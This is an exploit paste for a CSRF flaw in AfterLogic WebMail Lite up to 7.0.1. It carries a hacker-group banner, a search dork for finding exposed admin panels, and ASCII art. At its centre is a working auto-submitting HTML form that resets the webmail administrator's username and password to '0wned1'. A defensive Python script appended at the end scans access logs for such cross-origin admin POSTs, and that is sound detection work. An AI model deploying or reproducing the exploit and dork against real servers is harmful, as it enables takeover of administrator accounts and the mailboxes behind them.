- #########################################################################
- [+] Exploit Title : AfterLogic WebMail Lite PHP CSRF
- [+] Author : Pablo '7days' Riberio
- [+] Team: So Good Security
- [+] Other 0days : http://pastebin.com/u/7days
- [+] Version : <= 7.0.1
- [+] Tested on : windows/internet explorer
- [+] Details: Reset admin password via CSRF
- [+] Vendor: http://www.afterlogic.org/
- [+] Duck : inurl:webmail/adminpanel/index.php?submit
- #########################################################################
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
- my home boy linus, all the cockneys and my grandma <3
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- no thnx 2: microsoft, windoz, estate agents, all the script kiddies and recruiters
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- `..`.:::.`
- .://o:::///:.
- `::+y+::::::/+/`
- :/++/::/:/--:+o:`
- `://:-:/-/:.-:/oo.
- `/-.-:::/o---::+o.
- ....-:/+hs::--:+o
- .``-//ohh+----:+.
- `.``-/+syhs:----/+`
- .-.`.-:+syyo:--.-:+/
- `---.`.-/+yo/:-----:+o.
- .::-...-:+/o/-.-----:+so`
- .-::-...-:::::-----:://osy:
- .::-....--:::----::/+ooosys-
- `:--.....-:/:::::/+osyyyyo:`
- ` `----...--:/++++oosyyhhy+-`
- :::::-------:::---..--:/+oossyyhhhhs/.
- ::::::-------:--.-.--:+osyyyhhhhho-`
- ------------.....--:/+oyyhhhhhy+.
- -----------...---:/+osyhhhhyo:`
- :::::-------:::/+osyyhhhhs/.
- ++++++++++++oossyyhhhhs/.
- sssssssyyyyhhhhhhhyo:.`
- ``..---..`
- portuguese cyber army
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [+] Begin 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- <html>
- <head>
- </head>
- <body>
- <!-- AfterLogic WebMail Lite PHP 7.0.1 csrf -->
- <form action="http://www.victim.com/webmail/adminpanel/index.php?submit" method="POST" id="csrf" name="csrf" onload="go()">
- <input type="hidden" name="form_id" value="security" />
- <input type="hidden" name="txtUserName" value="0wned1" />
- <input type="hidden" name="txtNewPassword" value="0wned1" />
- <input type="hidden" name="txtConfirmNewPassword" value="0wned1" />
- <input type="submit" name="submit_btn" value="Save" />
- </form>
- <script language="JavaScript" type="text/javascript">
- document.csrf.submit();
- </script>
- </body>
- </html>
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- [+] End 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
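For defenders, the request this form produces can be looked for in web server access logs. The following is an added example, not part of the original paste or of AfterLogic's code: it flags POSTs to the `adminpanel/index.php?submit` endpoint whose Referer is absent or points to a host other than the webmail server. The combined log format, the hostnames and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined log format is assumed; adjust the pattern to your server's format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
# Endpoint taken from the form action in the paste: .../adminpanel/index.php?submit
ADMIN_SUFFIX = "/adminpanel/index.php"

def classify(line, trusted_hosts):
    """Return None if the line is not a POST to the admin submit endpoint,
    otherwise 'same-origin', 'cross-origin' or 'no-referer'."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    uri = urlsplit(m["uri"])
    params = [p.split("=", 1)[0] for p in uri.query.split("&")]
    if not uri.path.endswith(ADMIN_SUFFIX) or "submit" not in params:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"  # weaker signal: referrer policies can strip the header
    host = urlsplit(referer).hostname or ""
    return "same-origin" if host in trusted_hosts else "cross-origin"

def suspicious_posts(lines, trusted_hosts):
    """Return (ip, timestamp, verdict, referer) for admin POSTs not sent from our own pages."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for line in lines:
        verdict = classify(line, trusted)
        if verdict in ("cross-origin", "no-referer"):
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["ts"], verdict, m["referer"]))
    return hits

# Constructed sample log lines (documentation IP ranges and example hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "https://mail.example.org/webmail/adminpanel/index.php" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:05:12 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:07:40 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:08:00 +0000] "GET /webmail/adminpanel/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:09:00 +0000] "POST /webmail/index.php HTTP/1.1" 200 900 "http://other.example.net/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG, {"mail.example.org"}):
        print(hit)
```

Access logs do not record POST bodies, so the `form_id=security` field from the form cannot be matched here; correlate any hit with admin credential changes around the same timestamp.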